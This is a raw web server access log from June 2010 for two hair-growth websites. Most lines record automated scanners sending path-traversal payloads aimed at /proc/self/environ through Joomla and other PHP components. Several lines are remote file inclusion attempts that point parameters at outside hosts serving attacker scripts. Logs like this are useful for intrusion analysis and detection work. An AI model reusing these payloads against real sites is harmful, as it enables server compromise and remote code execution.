195.22.10.103 - - [20/Jun/2010:21:45:40 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.22.10.103 - - [20/Jun/2010:21:45:40 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:21:45:55 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:21:45:55 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:45:59 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:46:00 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:46:01 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
77.88.25.28 - - [20/Jun/2010:21:46:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5662 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:46:52 -0700] "GET /logs/access_100405.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:46:57 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:46:58 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:46:59 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
202.130.32.19 - - [20/Jun/2010:21:47:28 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:48:01 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:48:02 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:48:02 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
94.136.63.119 - - [20/Jun/2010:21:48:13 -0700] "GET /skin/zero_vote/ask_password.php?http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "growlonghairfast.com"
94.136.63.119 - - [20/Jun/2010:21:48:13 -0700] "GET /logs//skin/zero_vote/ask_password.php?http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "growlonghairfast.com"
94.136.63.119 - - [20/Jun/2010:21:48:14 -0700] "GET /skin/zero_vote/ask_password.php?http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "growlonghairfast.com"
94.136.63.119 - - [20/Jun/2010:21:48:14 -0700] "GET /logs//skin/zero_vote/ask_password.php?http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "growlonghairfast.com"
163.20.26.5 - - [20/Jun/2010:21:48:19 -0700] "GET /logs/access_100222.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
163.20.26.5 - - [20/Jun/2010:21:48:19 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
163.20.26.5 - - [20/Jun/2010:21:48:19 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:48:25 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:48:25 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:48:26 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
163.20.26.5 - - [20/Jun/2010:21:48:29 -0700] "GET /logs/access_100222.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
163.20.26.5 - - [20/Jun/2010:21:48:30 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
163.20.26.5 - - [20/Jun/2010:21:48:30 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
163.20.26.5 - - [20/Jun/2010:21:49:04 -0700] "GET /logs/access_100222.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
163.20.26.5 - - [20/Jun/2010:21:49:04 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
163.20.26.5 - - [20/Jun/2010:21:49:04 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:49:32 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:49:37 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:49:38 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:50:50 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:50:51 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:50:51 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:51:29 -0700] "GET /logs/access_100405.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
93.186.192.124 - - [20/Jun/2010:21:59:36 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
93.186.192.124 - - [20/Jun/2010:21:59:36 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
93.186.192.124 - - [20/Jun/2010:21:59:36 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
93.186.192.124 - - [20/Jun/2010:21:59:36 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
93.186.192.124 - - [20/Jun/2010:21:59:36 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
93.186.192.124 - - [20/Jun/2010:21:59:36 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:22:00:12 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:22:00:12 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:22:00:13 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:22:00:14 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:22:00:14 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:22:00:15 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
93.186.192.124 - - [20/Jun/2010:22:00:16 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
93.186.192.124 - - [20/Jun/2010:22:00:17 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
93.186.192.124 - - [20/Jun/2010:22:00:17 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
124.38.187.59 - - [20/Jun/2010:22:00:34 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:22:02:34 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:22:02:34 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:22:02:35 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:22:02:43 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:22:02:43 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:22:02:44 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:22:02:59 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:22:02:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:22:02:59 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:22:03:07 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:22:03:07 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:22:03:07 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:22:04:21 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:22:04:21 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:22:04:22 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:22:04:54 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:22:04:54 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:22:04:55 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
77.88.25.28 - - [20/Jun/2010:22:11:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14541 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
194.186.220.52 - - [20/Jun/2010:22:12:57 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.center-prestige.ru/catalogue/detail/?section=206&id=1855&sort=1" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" "www.freehairsecrets.com"
194.186.220.52 - - [20/Jun/2010:22:12:57 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" "www.freehairsecrets.com"
195.168.25.206 - - [20/Jun/2010:22:13:36 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.168.25.206 - - [20/Jun/2010:22:14:24 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.22.10.103 - - [20/Jun/2010:22:14:59 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.22.10.103 - - [20/Jun/2010:22:14:59 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.22.10.103 - - [20/Jun/2010:22:15:00 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.22.10.103 - - [20/Jun/2010:22:15:59 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.22.10.103 - - [20/Jun/2010:22:16:00 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.22.10.103 - - [20/Jun/2010:22:16:00 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
207.46.195.232 - - [20/Jun/2010:22:18:32 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "freehairsecrets.com"
207.46.195.232 - - [20/Jun/2010:22:19:10 -0700] "GET /BlackHairGrowth.htm HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "freehairsecrets.com"
77.88.25.28 - - [20/Jun/2010:22:21:27 -0700] "GET /freehairsecretsphp/viewtopic.php?p=636 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
195.168.25.206 - - [20/Jun/2010:22:21:55 -0700] "GET /logs/access.log/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.168.25.206 - - [20/Jun/2010:22:21:56 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.168.25.206 - - [20/Jun/2010:22:21:56 -0700] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.88.25.28 - - [20/Jun/2010:22:23:15 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13829 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
195.168.25.206 - - [20/Jun/2010:22:30:40 -0700] "GET /logs/access.log/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.168.25.206 - - [20/Jun/2010:22:30:40 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.168.25.206 - - [20/Jun/2010:22:30:40 -0700] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
207.218.209.178 - - [20/Jun/2010:22:31:04 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
207.218.209.178 - - [20/Jun/2010:22:31:04 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
207.218.209.178 - - [20/Jun/2010:22:31:04 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.20.81.163 - - [20/Jun/2010:22:31:38 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.20.81.163 - - [20/Jun/2010:22:31:38 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.20.81.163 - - [20/Jun/2010:22:31:38 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
205.251.131.18 - - [20/Jun/2010:22:32:56 -0700] "GET /logs/access_100503.log/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
205.251.131.18 - - [20/Jun/2010:22:32:56 -0700] "GET /spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
205.251.131.18 - - [20/Jun/2010:22:32:56 -0700] "GET /logs/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [20/Jun/2010:22:33:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6618 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
195.168.25.206 - - [20/Jun/2010:22:33:43 -0700] "GET /logs/access.log/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.168.25.206 - - [20/Jun/2010:22:33:43 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.168.25.206 - - [20/Jun/2010:22:33:44 -0700] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.15.152.183 - - [20/Jun/2010:22:35:09 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
67.15.152.183 - - [20/Jun/2010:22:35:22 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
67.15.152.183 - - [20/Jun/2010:22:35:33 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
67.15.152.183 - - [20/Jun/2010:22:35:38 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
67.15.152.183 - - [20/Jun/2010:22:35:44 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
67.15.152.183 - - [20/Jun/2010:22:36:13 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
78.129.168.234 - - [20/Jun/2010:22:39:57 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.129.168.234 - - [20/Jun/2010:22:39:57 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.129.168.234 - - [20/Jun/2010:22:39:58 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
99.198.113.90 - - [20/Jun/2010:22:41:26 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
99.198.113.90 - - [20/Jun/2010:22:41:26 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
99.198.113.90 - - [20/Jun/2010:22:41:26 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.59.156.163 - - [20/Jun/2010:22:42:12 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.59.156.163 - - [20/Jun/2010:22:42:12 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.59.156.163 - - [20/Jun/2010:22:42:12 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.59.156.163 - - [20/Jun/2010:22:42:31 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.59.156.163 - - [20/Jun/2010:22:42:32 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.59.156.163 - - [20/Jun/2010:22:42:32 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [20/Jun/2010:22:43:50 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12892 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
85.235.154.15 - - [20/Jun/2010:22:44:06 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.235.154.15 - - [20/Jun/2010:22:44:06 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.235.154.15 - - [20/Jun/2010:22:44:07 -0700] "GET /logs/access_100503.log//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.235.154.15 - - [20/Jun/2010:22:44:14 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.235.154.15 - - [20/Jun/2010:22:44:14 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
